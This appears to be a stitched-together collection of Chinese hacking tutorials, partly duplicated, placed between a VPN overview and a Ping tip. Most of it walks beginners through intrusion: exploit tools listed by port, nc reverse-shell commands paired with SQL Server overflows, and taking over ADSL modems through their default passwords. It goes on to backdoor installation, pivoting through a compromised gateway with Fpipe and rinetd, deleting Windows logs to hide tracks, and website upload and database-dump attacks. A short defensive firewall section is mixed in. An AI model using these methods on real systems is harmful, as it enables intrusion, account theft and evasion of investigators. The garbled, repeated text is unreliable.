虚拟专用网络允许远程通讯方，销售人员或企业分支机构使用Internet等公共互联网络的路由基础设施以安全的方式与位于企业局域网端的企业服务器建立连接。虚拟专用网络对用户端透明，用户好象使用一条专用线路在客户计算机和企业服务器之间建立点对点连接，进行数据的传输。

　　虚拟专用网络技术同样支持企业通过Internet等公共互联网络与分支机构或其它公司建立连接，进行安全的通讯。这种跨越Internet建立的VPN连接逻辑上等同于两地之间使用广域网建立的连接。

　　虽然VPN通讯建立在公共互联网络的基础上，但是用户在使用VPN时感觉如同在使用专用网络进行通讯，所以得名虚拟专用网络。

　　使用VPN技术可以解决在当今远程通讯量日益增大，企业全球运作广泛分布的情况下，员工需要访问中央资源，企业相互之间必须进行及时和有效的通讯的问题。

　　如果希望企业员工无论身处何地都能够与企业计算资源建立连接，企业必须采用一个可靠性高、扩展性强的远程访问解决方案。一般的，企业有如下选择：

　　1.管理信息系统（MIS）部门驱动方案。建立一个内部的MIS部门专门负责购买，安装和维护企业modem池和专用网络基础设施。 

　　2.增值网络（VAN）方案。企业雇佣一个外部公司负责购买，安装和维护modem池和远程通讯网络基础设施。

　　从费用，可靠性，管理和便于连接等几方面来看，这两种方案都不能最大程度的满足企业对网络安全性或扩展性的要求。因此，选择一种基于Internet技术的廉价方案取代企业花费在modem池和专用网络基础设施上的投资就显得极为重要。

　　二、虚拟专用网络的基本用途

　　通过Internet实现远程用户访问

　　虚拟专用网络支持以安全的方式通过公共互联网络远程访问企业资源。

　　与使用专线拨打长途或（1-800）电话连接企业的网络接入服务器（NAS）不同，虚拟专用网络用户首先拨通本地ISP的NAS，然后VPN软件利用与本地ISP建立的连接在拨号用户和企业VPN服务器之间创建一个跨越Internet或其它公共互联网络的虚拟专用网络。

1. 1433端口入侵

scanport.exe 查有1433的机器

SQLScanPass.exe 进行字典暴破（字典是关键）

最后 SQLTools.exe入侵

对sql的sp2及以下的系统，可用sql的hello 溢出漏洞入侵。

nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口

（以上反向的，测试成功）

sqlhelloz.exe 入侵ip 1433 （这个是正向连接）

2. 4899端口入侵

用4899过滤器.exe，扫描空口令的机器

3. 3899的入侵

对很早的机器，可以试试3389的溢出(win3389ex.exe)

对2000的机器，可以试试字典暴破。(tscrack.exe)

4. 80入侵

对sp3以前的机器，可以用webdav入侵；

对bbs论坛，可以试试上传漏洞（upfile.exe或dvup_delphi.exe）

可以利用SQL进行注入。（啊D的注入软件）。

5. serv-u入侵(21端口）

对5. 004及以下系统，可用溢出入侵。（serv5004.exe）

对5.1.0.0及以下系统，可用本地提升权限。（servlocal.exe）

对serv-u的MD5加密密码，可以用字典暴破。（crack.vbs）

输入一个被serv-u加密的密码（34位长），通过与字典档（dict.txt）的比较，得到密码

6. 554端口

用real554.exe入侵。

7. 6129端口

用DameWare6129.exe入侵。

8. 系统漏洞

利用135、445端口，用ms03026、ms03039、ms03049、ms04011漏洞，

进行溢出入侵。

9. 3127等端口

可以利用doom病毒开的端口，用nodoom.exe入侵。（可用mydoomscan.exe查）。

10. 其他入侵

利用shanlu的入侵软件入侵（WINNTAutoAttack.exe）。

希望对新手入侵有帮助！

1. 1433端口入侵

scanport.exe 查有1433的机器

SQLScanPass.exe 进行字典暴破（字典是关键）

最后 SQLTools.exe入侵

对sql的sp2及以下的系统，可用sql的hello 溢出漏洞入侵。

nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口

（以上反向的，测试成功）

sqlhelloz.exe 入侵ip 1433 （这个是正向连接）

2. 4899端口入侵

用4899过滤器.exe，扫描空口令的机器

3. 3899的入侵

对很早的机器，可以试试3389的溢出(win3389ex.exe)

对2000的机器，可以试试字典暴破。(tscrack.exe)

4. 80入侵

对sp3以前的机器，可以用webdav入侵；

对bbs论坛，可以试试上传漏洞（upfile.exe或dvup_delphi.exe）

可以利用SQL进行注入。（啊D的注入软件）。

5. serv-u入侵(21端口）

对5. 004及以下系统，可用溢出入侵。（serv5004.exe）

对5.1.0.0及以下系统，可用本地提升权限。（servlocal.exe）

对serv-u的MD5加密密码，可以用字典暴破。（crack.vbs）

输入一个被serv-u加密的密码（34位长），通过与字典档（dict.txt）的比较，得到密码

6. 554端口

用real554.exe入侵。

7. 6129端口

用DameWare6129.exe入侵。

8. 系统漏洞

利用135、445端口，用ms03026、ms03039、ms03049、ms04011漏洞，

进行溢出入侵。

9. 3127等端口

可以利用doom病毒开的端口，用nodoom.exe入侵。（可用mydoomscan.exe查）。

10. 其他入侵

利用shanlu的入侵软件入侵（WINNTAutoAttack.exe）。

一.扫描

现在很多ADSL MODEM都是通过 80 23 21 三个端口来管理，但80 21端口有很多服务器都有打开，没怎么特征性，于是我选择了23端口，打开我的至爱：SUPPERSCAN，填上我所在地区的IP段，（跨多几段都没关系，反正SUPPERSCAN的速度就是快）眨眼间，结果出来了，开23的主机还真不小啊：）我挑了几台出来，在浏览器那里输入IP：218.xxx.xxx.xxx，OK。登陆对话框出来了，输入USER：ADSL pass:adsl1234（因为我这里的adsl modem一般是华硕的，缺省是adsl adsl1234）bingle 一矢中的，现在我就是上帝。

二.映射

入侵已经成功了一半，要进一步入侵内网，我门要进行端口映射，但是我连内网的拓扑，都不知道（更不用说内网主机的端口开放情况了）又怎么映射呢？在此，我选择了猜测。一般来说，MODEM的内网IP缺省是192.168.1.1，而大多数就把自己主机的IP设成192.168.1.2。因此我们只要试试把192。168。1。2的端口映射出来就行了（但如果使用了dhcp就麻烦了）但是192。168。1。2到底开放了什么端口，我们根本就不知道啊，呵呵，既然不知道，那么我就把他整台主机透明地映射到外网，具体做法如下：进入NAT选项---添加NAT规则---BAMID---填入主机IP：192。168。1。2，到此192。168。1。2已经透明地映射到192。168。1。1上了，我们访问ADSL MODEM就等于访问主机192。168。1。2了

三。检测漏洞

现在我们再请出SUPPERSCAN对218。xxx.xxx.xxx进行扫描，呵，看到没有？扫描结果已经不同了，开放的端口是139 1433等，刚才只是开放了80 23 21 而已（也就是说我们的映射已经成功了）该是X-SCAN出手了，用它来扫弱口令最好不过了，但扫描的结果令人失望，一个弱口令也没有，看来管理员还不算低B啊

四。溢出

既然没有弱口令，也没开80，那只好从逸出方面着手了，但没开80 21 也就webdav .sevr-u的溢出没戏了，很自然，我向导了RPC溢出，但实践证明RPC溢出也是不行的，LSASS溢出也不行

五。募然回首，那人却在，灯火阑珊处

开来这管理员还是比较负责的，该打的补丁都打上了，这时侯，我的目光转移到1433上了（嘿，不知道他打了SQL补丁没有？，心动不如行动，现在只好死马当活马医了，于是

nc -v -l 99

sql2 218.xxx.xxx.xxx 0 218.xxx.xxx.xxx 99

bingle 成功地得到一个shell了

六。设置后门

到这里，我们的入侵已经成功了，余下的是扫尾留后门，至于后门，我一般都是用FTP上传RADMIN上去的，呵呵，这里不详谈了，相信各位都知道。

    选择"创建IP安全策略",会弹出向导窗口,单击下一步,在弹出的窗口中,输入此策略的名称,比如这里我们键入"3389过滤"再单击下一步,以后全部默认下一步,其中有一个警告,单击"是"即可这样就完成新策略的添加.如图2:

   点击确定后,回到图1界面,选择"管理IP筛选器操作",弹出窗口,如图3

    我们先要建立一个筛选器,单击"添加",弹出窗口,在筛选器名称里填入"3389筛选器1",再单击旁边的"添加",会弹出向导窗口,单击"下一步",会出现源地址选项,(你可以按照自己的需要选择),在这里我们选择"任何IP地址",单击下一步,在目的地址中选择"我的IP地址",再单击下一步,选择IP协议,这里我们选择TCP,单击下一步,会出现端口选择,如图4:


4

  我们设置从任何端口到本机的3389端口.单击下一步.就完成了筛选器的建立.如图5:

5

    接着回到图3界面,单击"管理筛选器操作"页栏,单击"添加",会弹出筛选器操作向导,单击"下一步",取名为"阻止3389",单击下一步,
在选择操作页面中选择"阻止",单击"下一步",就完成了筛选器的建立.如图6:

6

   好了! 我们建立了筛选器和筛选器操作,现在就要建立IP安全规则了.(***)在图1界面中,双击我们刚刚建立的"3389过滤"策略,弹出策略属性窗口,然后单击"添加"弹出向导,单击"下一步",一直单击下一步,其中一个选择"是",直到这里,如图7:

7

    这时,我们要选择我们刚才建立的"3389筛选器1",然后再单击下一步.如图8:(大家注意到没有,傍边的"添加""编辑"等按钮,其实我们可以在此向导中就可以一次完成建立筛选器及筛选器操作等工作)图8

8

    我们选择建立的"阻止3389"的操作,单击"下一步",就完成了安全规则的建立.

现在我们就已经有了一个基于在3389端口阻止所有IP连接的安全策略了.现在,你在图1的界面上,在"3389过滤"策略上单击右键,再单击"指派",这样,系统就开始应用安全策略了.所有连接3389的TCP请求都将被阻止.

现在所有的连接都被阻止了,管理员如何连接呢? 别急我们再来建立一个允许管理员登陆的策略.

    我们回到图3的界面,重复建立筛选器的步骤,建立一个名为"3389筛选器2"的筛选器,别的设置和"3389筛选器1"的一样,只是在选择源地址时要选择"一个特定的IP地址",这里比如我的管理员工作站IP是192.168.0.2,如图9:

9

    然后再重复建立筛选器操作的步骤,建立一个名为"允许3389"的操作,和上面不同的是在选择动作时使用"许可".

    再回到上面的(***)的地方,重复建立规则的步骤,用"3389筛选器2"和"允许3389"建立一个新的规则,完成后在策略"3389过滤"属性中显示如下:如图10:

10

    至此,我们已经完成了在3389端口上的IP策略!此时,只有来自192.168.0.2的IP地址将被许可连接,其他的IP地址通讯都将被阻塞.(IP策略需要指派后才可生效,不需要重起,在更改设置时也不用停止后再指派.指派相应的IP策略后,此IP策略名上有个小绿点)

**********************************************
关于动态IP连接的问题

    对于拨号上网或动态IP地址的管理员,我想应该可以在允许连接源地址中选择"一个特定的子网"来实现.我没有环境,所以测试不了.只有猜了.见谅!

    另外,是不是可以尝试使用一下第三方工具,如winrouter.设置它关掉任何对3389的连接,当管理员需要连接3389时,使用本地winrouter远程控制服务器winrouter打开对自己当前IP的允许连接,就可以上3389了.管理完毕后,再将3389关掉,也可以从一定程度上加强系统安全.
**********************************************

本文中揭露了黑客攻击ADSL用户，窃取用户名密码的常见方法，读者请勿将其用于不法用途，并提醒所有与此漏洞相关的用户尽快采取措施进行防范。

ADSL作为一种宽带接入方式已经被广大用户接受，现在一些用户家里有很多台电脑，通过一台ADSL路由器拨号上网，这样充分利用了带宽，对于家中有多台电脑需共享上网的用户来说，一般可通过建立和配置代理服务器来实现共享上网，缺点是主机必须开着才能实现共享；另外一种有效的方法是使用路由器来实现共享，这样每个客户端都能独立上网，不足之处是要添置昂贵的路由设备。其实有些ADSL MODEM本身就带有路由功能，只要用户能够正确配置相关参数就可以路由共享，根本不需要外添设备。

国内ADSL服务提供商所提供的调制解调器大部分都内置了路由功能，不过由于技术上的原因，少量ADSL调制解调器虽然在硬件上设计了路由功能，但调制解调器随机软件并不能支持在PPPoE虚拟拨号接入方式下使用该功能，只有拥有固定IP地址的专线用户才可以使用路由功能，或者需要服务商局端设备同为该品牌的产品才能够支持在PPPoE接入方式下使用，这时需要升级调制解调器的软件后才可以使用内置的路由功能。不同路由器的配置方法不同，这类主题的帖子网上有很多，我们在这里主要介绍那些使用路由拨号上网的用户，需要注意的安全问题。

最常见的安全问题就是用户没有修改路由器的配置密码，一般的路由器在出场的时候夺回有一个默认的配置密码。只有知道这个密码，用户才能对路由器的进行配置。很多用户在配置自己的路由器之后，并没有修改这个密码。导致网上一些不法之徒可以控制路由器，从而盗窃用户的ADSL账号。这些不法之徒是如何做的呢，我们下面来把他们的手法一一曝光。

2.扫描ADSL在线用户 寻找攻击目标

扫描ADSL上网用户的IP段，获取开放80端口的主机列表

这些用户首先拨通自己家的ADSL，然后用ipconfig命令查看自己的Ip，如下图所示：

在开始－>运行－>输入cmd，在出现的dos窗口中输入ipconfig即可看到：

一般北京的ADSL上网的用户多为61.49.*.*。获得了自己的IP段之后，就可以找一个好的端口扫描工具了。新在端口扫描工具有很多，其中支持多线程、体积小、速度快的首推superscan。我们这里就使用它作为示范工具。Superscan的界面如下：

一般我们在开始地址处输入自己的IP段首地址，即61.49.*.1，结束IP地址会自动显示出61.49.*.254，这里需要说明的是，旁边那个ping,以及connect数据需要根据自己的情况输入，对于本网段的IP，即IP地址前3部分与自己的IP地址相同的IP，在扫描的时候可以把这些数据设置的短小一些，而对于其他网段的地址，一般需要设置的大一点。具体情况根据扫描结果而定，如果输入的数据太小，扫描之后会找不到计算机。

下面需要设置一下扫描端口，我们在探测路由器的时候只需要扫描80端口即可。所以单击窗体右上的配置列表，会出现如下窗体：

修改select ports如图所示，去掉所有其他端口前的绿钩，（单击该端口即可）最终只保留80端口，然后单击save，把端口配置表保存到硬盘上，以后每次使用superscan的时候就不再需要从新配置，只需要load即可。

全部设置好之后，单击start进行扫描。扫描结束之后，如图所示：

我们可以看到这个网段有两台机器打开了80端口，单击这两台机器左边的小＋号图标，可以显示这两台机器所开发的端口信息。61.49.150.68这台机器开放的是一个IIS的服务器，61.49.150.85这台机器开的是一个302标志，根据经验，我们可以知道这里开放的是一个中兴系列的路由器配置接口。本篇文章我们主要介绍ADSL路由器的安全隐患，IIS的安全性问题我们在后面的文章再介绍，这里我们只需在61.49.150.85上单击右键，选择web方式浏览即可。

3.点击鼠标轻松破解密码 防范意识需加强

单击之后会出现一个连接配置对话框，如图所示：

点击OK，就可以连接了。连接之后弹出的提示框如图所示：

通过刚才连接页上的标志，我们可以肯定这是一台中兴831路由器，输入出厂默认的用户名、密码：ZXDSL、ZXDSL，就进入了配置界面：

我们可以看到这个网段有两台机器打开了80端口，单击这两台机器左边的小＋号图标，可以显示这两台机器所开发的端口信息。61.49.150.68这台机器开放的是一个IIS的服务器，61.49.150.85这台机器开的是一个302标志，根据经验，我们可以知道这里开放的是一个中兴系列的路由器配置接口。本篇文章我们主要介绍ADSL路由器的安全隐患，IIS的安全性问题我们在后面的文章再介绍，这里我们只需在61.49.150.85上单击右键，选择web方式浏览即可。

3.点击鼠标轻松破解密码 防范意识需加强

单击之后会出现一个连接配置对话框，如图所示：

点击OK，就可以连接了。连接之后弹出的提示框如图所示：

通过刚才连接页上的标志，我们可以肯定这是一台中兴831路由器，输入出厂默认的用户名、密码：ZXDSL、ZXDSL，就进入了配置界面：

 

点击导航栏上的“quick configuration”就进入了快速配置界面，如图所示：

用户名已经看到了，密码却显示为小黑点，这怎么办呢，其实也难不倒大家，单击右键，选择查看源代码：

至此一个ADSL账户就被轻易盗取了。

其实补上这个漏洞的方法非常简单，只要用户在安装路由器的时候修改自己默认的密码即可了，但是很多人都没有去做这一步，为黑客留下了很多“靶子”。

我们把一些常见的路由器配置口令和IP地址公布一下，希望大家根据自己的路由器品牌进行甄别，修改默认的口令。需要说明的是，这些数据都不是什么机密，它们就印在产品的说明书上面，所以我们强烈建议路由方式上网的ADSL用户赶快修改你们的密码，不要为不法之徒留下犯罪的空间。

原理如下：

MAC和IP捆绑是在服务器上，那么大家想想，作用范围应该是什么呢？当然也只有在服务器对客户机上了，但是如果我修改了客户机上的IP，那服务器上的怎样呢？如果你已经想到这了，那就已经理论的破解了捆绑了。

步骤如下：

1、首先要探明IP的范围和被限制的IP的范围，若IP是172.16.xxx.xxx，MAC是52-54-AB-12-34-56，那么IP范围应该是在172.16.0.1——172.16.255.255，我想不太可能都捆绑完吧，否则你就只能等着die了。

2、对172.16.0.1——172.16.255.255做一次完整的扫描，以防造成不必要的麻烦（IP冲突），引起网管的注意，那样就不管了。

3、找到没有人使用的IP，从172.16.255.255往172.16.0.1找，因为一般的网管是从172.16.0.1开始使用的，后面的一般没有使用，突破口就在这儿了。

4、在网上邻居->属性->TCP/IP属性固定刚才拿到的IP地址，95/98/ME请看第5步，2K、XP至此完成，打开IE试试吧，又飞翔在INTERNET上了。

5、在95/98/ME系统上修改了IP，会提示重启，以防机器安装还原卡或类似的产品只能不重启，那就在我的电脑->属性->网卡->先禁用后再启用（需要等一会）->确定，现在打开IE试试，也已经可以了.

至此完成破解。

解决方法：

安装ISA一类的代理服务软件进行管理，最安全的是划分VLAN，不过交换机得支持才行。

首选要突破网关（GetWay），这很容易理解，因为一个内网要访问internet总是必然通过网关接入的，至于怎样突破网关，这和进入不是网关的服务器没有什么两样，就不说了。

突破网关以后，我们的目标就是通过网关（IP为202.98.*.*）上网的192.168.21.75。以后的方法就是在网关力端口重定向，建立包转发。端口重定向分两种（local和remote），但是我们要进而内网，显然不能用local方式的重定向，local方式的重定向主要用来绕过_blank">防火墙（关于这个问题我将在随后单独写一篇文章来讨论怎样用端口重定向绕过_blank">防火墙）。

一、利用Fpipe建立端口重定向。
Fpipe是个非常有趣的东东。为了证明Fpipe的端口重定向功能，我们来做这样的试验。
首先在自己的机器上运行Fpipe，如下：

E:\tool\FPip>fpipe -l 80 -s 90 -r 80 202.98.177.162
FPipe v2.1 - TCP/UDP port redirector.
Copyright 2000 (c) by Foundstone, Inc.
<br>http://www.foundstone.com

//解释一下这个命令
fpipe -l 80 -s 90 -r 80 202.98.177.162
将到本机80端口的连接通过90端口连接到202.98.177.162的80端口。
一下是详细语法：
FPipe [-hv?] [-brs ] IP
-?/-h - shows this help text
-c - maximum number of allowed simultaneous connections. Default is 32 #连接的最大数目,默认是32
-l - listening port number #要监听的TCP端口号
-r - remote TCP port number #要定向到的IP主机的端口号
-s - outbound connection source port number #从哪个端口发出重定向信息
-v - verbose mode #详细显示过程

在上面的过程中，我们在自己的机器上建立了端口重定向：将到本机80端口的连接通过90端口连接到202.98.177.162的80端口
然后我们在浏览器中输入：<br>http://127.0.0.1，结果发现昆明高新区的网页打了，这说明我们的重定向成功。
此时fpipe现实了如下的内容：
Pipe connected:
In: 127.0.0.1:2092 --> 127.0.0.1:80
Out: 192.168.168.112:90 --> 202.98.177.162:80

从上面的输出可以看出数据包经过的路径（192.168.168.112是我的IP）
好了成功以后，下面的东西我不说大家也知道了，将Fpipe拷贝到我们控制的网关上，执行重定向：
fpipe -l 81 -s 91 -r 21 192.168.21.75 #在网关（202.98.*.*）执行，将到202.98.*.*的81端口的数据通过91端口转发向192.168.21.75的21端口。同样的：
fpipe -l 82 -s 92 -r 23 192.168.21.75 #将到202.98.*.*的82端口的数据通过92端口转发向192.168.21.75的23端口
fpipe -l 83 -s 93 -r 80 192.168.21.75 #将到202.98.*.*的83端口的数据通过93端口转发向192.168.21.75的80端口
fpipe -l 84 -s 94 -r 139 192.168.21.75 #将到202.98.*.*的84端口的数据通过94端口转发向192.168.21.75的139端口
下面的你更应该知道了：
如果你在本机telnet到202.98.*.*的81就等价于你telnet到192.168.21.75的21，不对啊！192.168.21.75的21应该FTP上去才对啊（哈哈），那就ftp到202.98.*.*的81端口吧！

写到这里我也忍不住喊“真牛…………真牛…………”

二、利用rinetd建立重定向。
方法和上面一样。在网关上运行rineted，不过要建立个配置文件（文件名和扩展名随意了在这里我以配置文件为conf.ini做例子说）
在本地用计事本建立如下内容的配置文件（其中的*不方便说，别找这写哦！他的意思是将到202.98.*.* 的90的包转发到192.168.21.75的80）
202.98.*.* 90 192.168.21.75 80
将他存为conf.ini文件然后和rineted拷贝到那个网关上（202.98.*.* ），然后
在网关上执行
rinetd -c conf.ini
然后你连接到202.98.*.* 90和连接到192.168.21.75 80的效果是一样的。

顺便说说rinetd配置文件的语法为
bindaddress bindport connectaddress connectport

写在后面：
Fpipe和rineted是很牛的两个工具，通常我是用这两个工具来突破防火墙的，以后抽空说说这个问题。

二: Windows2000的日志文件通常有应用程序日志，安全日志、系统日志、DNS服务器日志、FTP日志、WWW日志等等。

日志文件默认位置：

应用程序日志、安全日志、系统日志、DNS日志默认位置：%sys temroot%\system32\config，默认文件大小512KB，管理员都会改变这个默认大小。

安全日志文件：%systemroot%\system32\config\SecEvent.EVT；

系统日志文件：%systemroot%\system32\config\SysEvent.EVT；

应用程序日志文件：%systemroot%\system32\config\AppEvent.EVT；

Internet信息服务FTP日志默认位置：%systemroot%\system32\logfiles\msftpsvc1\，默认每天一个日志；

Internet信息服务WWW日志默认位置：%systemroot%\system32\logfiles\w3svc1\，默认每天一个日志；

Scheduler服务日志默认位置：%sys temroot%\schedlgu.txt；

以上日志在注册表里的键：

应用程序日志，安全日志，系统日志，DNS服务器日志，它们这些LOG文件在注册表中的：

HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Eventlog

有的管理员很可能将这些日志重定位。其中EVENTLOG下面有很多的子表，里面可查到以上日志的定位目录。

Schedluler服务日志在注册表中

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchedulingAgent

FTP和WWW日志详解：

FTP日志和WWW日志默认情况，每天生成一个日志文件，包含了该日的一切记录，文件名通常为ex（年份）（月份）（日期），例如ex001023，就是2000年10月23日产生的日志，用记事本就可直接打开，如下例：

#Software: Microsoft Internet Information Services 5.0　　（微软IIS5.0）

#Version: 1.0 （版本1.0）

#Date: 20001023 0315 （服务启动时间日期）

#Fields: time cip csmethod csuristem scstatus

0315 127.0.0.1 [1]USER administator 331　（IP地址为127.0.0.1用户名为administator试图登录）

0318 127.0.0.1 [1]PASS – 530　（登录失败）

032:04 127.0.0.1 [1]USER nt 331　（IP地址为127.0.0.1用户名为nt的用户试图登录）

032:06 127.0.0.1 [1]PASS – 530　（登录失败）

032:09 127.0.0.1 [1]USER cyz 331　（IP地址为127.0.0.1用户名为cyz的用户试图登录）

0322 127.0.0.1 [1]PASS – 530　（登录失败）

0322 127.0.0.1 [1]USER administrator 331　（IP地址为127.0.0.1用户名为administrator试图登录）

0324 127.0.0.1 [1]PASS – 230　（登录成功）

0321 127.0.0.1 [1]MKD nt 550　（新建目录失败）

0325 127.0.0.1 [1]QUIT – 550　（退出FTP程序）

从日志里就能看出IP地址为127.0.0.1的用户一直试图登录系统，换了四次用户名和密码才成功，管理员立即就可以得知管理员的入侵时间、IP地址以及探测的用户名，如上例入侵者最终是用administrator用户名进入的，那么就要考虑更换此用户名的密码，或者重命名administrator用户。

WWW日志：

WWW服务同FTP服务一样，产生的日志也是在%sys temroot%\sys tem32\LogFiles\W3SVC1目录下，默认是每天一个日志文件，下面是一个典型的WWW日志文件

#Software: Microsoft Internet Information Services 5.0

#Version: 1.0

#Date: 20001023 03:091

#Fields: date time cip csusername sip sport csmethod csuristem csuriquery scstatus cs(UserAgent)

20001023 03:091 192.168.1.26 192.168.1.37 80 GET /iisstart.asp 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt)

20001023 03:094 192.168.1.26 192.168.1.37 80 GET /pagerror.gif 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt)

通过分析第六行，可以看出2000年10月23日，IP地址为192.168.1.26的用户通过访问IP地址为192.168.1.37机器的80端口，查看了一个页面iisstart.asp,这位用户的浏览器为compatible;+MSIE+5.0;+Windows+98+DigExt，有经验的管理员就可通过安全日志、FTP日志和WWW日志来确定入侵者的IP地址以及入侵时间。

既使你删掉FTP和WWW日志，但是还是会在系统日志和安全日志里记录下来，但是较好的是只显示了你的机器名，并没有你的IP。

属性里记录了出现警告的原因，是因为有人试图用administator用户名登录，出现一个错误，来源是FTP服务。

这里有两种图标：钥匙（表示成功）和锁（表示当用户在做什么时被系统停止）。接连四个锁图标，表示四次失败审核，事件类型是帐户登录和登录、注销失败，日期为2000年10月18日，时间为1002，这就需要重点观察。

双点第一个失败审核事件的，即得到此事件的详细描述。

经过分析我们可以得知有个CYZ的工作站，用administator用户名登录本机，但是因为用户名未知或密码错误（实际为密码错误）未能成功。另外还有DNS服务器日志，不太重要，就此略过（其实是我没有看过它）。

知道了Windows2000日志的详细情况，下面就要学会怎样删除这些日志：

通过上面，得知日志文件通常有某项服务在后台保护，除了系统日志、安全日志、应用程序日志等等，它们的服务是Windos2000的关键进程，而且与注册表文件在一块，当Windows2000启动后，启动服务来保护这些文件，所以很难删除，而FTP日志和WWW日志以及Scedlgu日志都是可以轻易地删除的。首先要取得Admnistrator密码或Administrators组成员之一，然后Telnet到远程主机，先来试着删除FTP日志：

D:\SERVER>del schedlgu.txt

D:\SERVER\SchedLgU.Txt

进程无法访问文件，因为另一个程序正在使用此文件。说过了，后台有服务保护，先把服务停掉！

D:\SERVER>net stop "task scheduler"

下面的服务依赖于 Task Scheduler 服务。停止 Task Scheduler 服务也会停止这些服务。

Remote Storage Engine

是否继续此操作? (Y/N) [N]: y

Remote Storage Engine 服务正在停止....

Remote Storage Engine 服务已成功停止。

Task Scheduler 服务正在停止.

Task Scheduler 服务已成功停止。

OK，它的服务停掉了，同时也停掉了与它有依赖关系的服务。再来试着删一下！

D:\SERVER>del schedlgu.txt

D:\SERVER>

没有反应？成功了！下一个是FTP日志和WWW日志，原理都是一样，先停掉相关服务，然后再删日志！

D:\SERVER\system32\LogFiles\MSFTPSVC1>del ex*.log

D:\SERVER\system32\LogFiles\MSFTPSVC1>

以上操作成功删除FTP日志！再来WWW日志！

D:\SERVER\system32\LogFiles\W3SVC1>del ex*.log

D:\SERVER\system32\LogFiles\W3SVC1>

OK！恭喜，现在简单的日志都已成功删除。下面就是很难的安全日志和系统日志了，守护这些日志的服务是Event Log，试着停掉它！

D:\SERVER\system32\LogFiles\W3SVC1>net stop eventlog

这项服务无法接受请求的 "暂停" 或 "停止" 操作。没办法，它是关键服务。如果不用第三方工具，在命令行上根本没有删除安全日志和系统日志的可能！所以还是得用虽然简单但是速度慢得死机的办法：打开“控制面板”的“管理工具”中的“事件查看器”（98没有，知道用Win2k的好处了吧），在菜单的“操作”项有一个名为“连接到另一台计算机”的菜单，点击它，输入远程计算机的IP，然后等上数十分钟，接着选择远程计算机的安全性日志，右键选择它的属性：点击属性里的“清除日志”按钮，OK！安全日志清除完毕！同样的忍受痛苦去清除系统日志！ 目前在不借助第三工具的情况下，能很快，很顺利地清除FTP、WWW还有Schedlgu日志，就是系统日志和安全日志属于Windows2000的严密守护，只能用本地的事件查看器来打开它，因为在图形界面下，加之网速又慢，如果你银子多，时间闲，还是可以清除它的。综上所述，介绍了Windows2000的日志文件以及删除方法，但是你必须是Administrator，注意必须作为管理员或管理组的成员登录才能打开安全日志记录。该过程适用于 Windows 2000 Professional 计算机，也适用于作为独立服务器或成员服务器运行的 Windows 2000 Server 计算机。

至此，Windows2000安全知识基础讲座完毕，还有几句话要讲，大家也看出来了，虽然FTP等等日志可以很快清除，但是系统日志和安全日志却不是那么快、那么顺利地能删除，如果遇到聪明的管理员，将日志文件转移到另一个地方，那更是难上加难，所以奉劝大家，千万不要拿国内的主机做试验，国内的法律很严呀！今天吃饭时，听说有两个人开玩笑，一个人把另外一个人的东西藏起来了，结果那个人一急，报案了，于是藏东西那个人被判四年刑！！法官说法律是不开玩笑的！！！所以大家一定要牢记这点！(不要说我老生常谈)

这篇文章对于新手来说是比较喜欢的，因为网站入侵都是大家比较关注的，特别是新手，这对大家来说是一个比较热门的话题。入侵，新手要入侵首先必须知道入侵的详细步骤。现面就来看看本文给大家介绍的几种入侵方法吧。这里有五种入侵介绍。相信大家一定会喜欢的。
   
    首先介绍下什么样的站点可以入侵：必须是动态的网站 比如 asp php jsp 这种形式的站点 后缀为.htm的站点劝大家还是不要入侵了吧（入侵几率几乎为0） 入侵介绍： 1。上传漏洞 2。暴库 3。注入 4。旁注 5。COOKIE诈骗

1：上传漏洞，这个漏洞在DVBBS6.0时代被黑客们利用的最为猖獗，利用上传漏洞可以直接得到WEBSHELL，危害等级超级高，现在的入侵中上传漏洞也是常见的漏洞。 怎样利用：在网站的地址栏中网址后加上/upfile.asp如果显示 上传格式不正确[重新上传] 这样的字样8成就是有长传漏洞了找个可以上传的工具直接可以得到WEBSHELL 工具介绍：上传工具 老兵的上传工具 DOMAIN3.5 这两个软件都可以达到上传的目的 用NC也可以提交

WEBSHELL是什么：WEBSHELL在上节课简单的介绍了下，许多人都不理解，这里就详细讲下，其实WEBSHELL并不什么深奥的东西，是个WEB的权限，可以管理WEB，修改主页内容等权限，但是并没有什么特别高的权限，（这个看管理员的设置了）一般修改别人主页大多都需要这个权限，接触过WEB木马的朋友可能知道（比如老兵的站长助手就是WEB木马 海阳2006也是 WEB木马）我们上传漏洞最终传的就是这个东西，有时碰到权限设置不好的服务器可以通过WEBSHELL得到最高权限。

2。暴库：这个漏洞现在很少见了，但是还有许多站点有这个漏洞可以利用，暴库就是提交字符得到数据库文件，得到了数据库文件我们就直接有了站点的前台或者后台的权限了。

暴库方法：比如一个站的地址为 http://www.xxx.com/dispbbs.asp?boardID=7&ID=161 我门就可以把com/dispbbs中间的/换成%5c 如果有漏洞直接得到数据库的绝对路径 用寻雷什么的下载下来就可以了 还有种方法就是利用默认的数据库路径 http://www.xxx.com/ 后面加上 conn.asp 如果没有修改默认的数据库路径也可以得到数据库的路径（注意：这里的/也要换成%5c）

为什么换成%5c：因为在ASCII码里/等于%5c，有时碰到数据库名字为/#abc.mdb的为什么下不了？ 这里需要把#号换成%23就可以下载了，为什么我暴出的数据库文件是以。ASP结尾的？我该怎么办？这里可以在下载时把。ASP换成。MDB 这样就可以下载了如果还下载不了可能作了防下载。

“.0”可以有条件省略

大家常用“ping 127.0.0.1”命令在本机上做回路测试，用来验证本机的TCP/IP协议簇是否被正确安装。但你发现了吗?使用“ping 127.1”这个命令也能得到同样的测试结果(如图)，其实“ping 127.1”和“ping 127.0.0.1”这两条命令是一样的，都是在进行回路测试。

为什么会这样呢?这就是Ping命令应用中IP地址的使用技巧。大家都知道，IP地址由32位二进制数字组成，为了方便大家记忆，将每8位二进制数字换算成十进制数字，因此就形成了容易记忆的由四部分十进制数字组成的IP地址(如127.0.0.1)。由于，Windows操作系统具有自动填充 “.0”的功能，因此我就可将“127.0.0.1”变为“127.1”。

但是，这个“.0”的省略是有条件限制的，并不能任意省略。在Ping命令的应用中，只能将在IP地址的最后一部分十进制数字前出现的一个或多个“.0”省略，如把“ping 127.0.0.1”命令改写成“ping 127.1”。

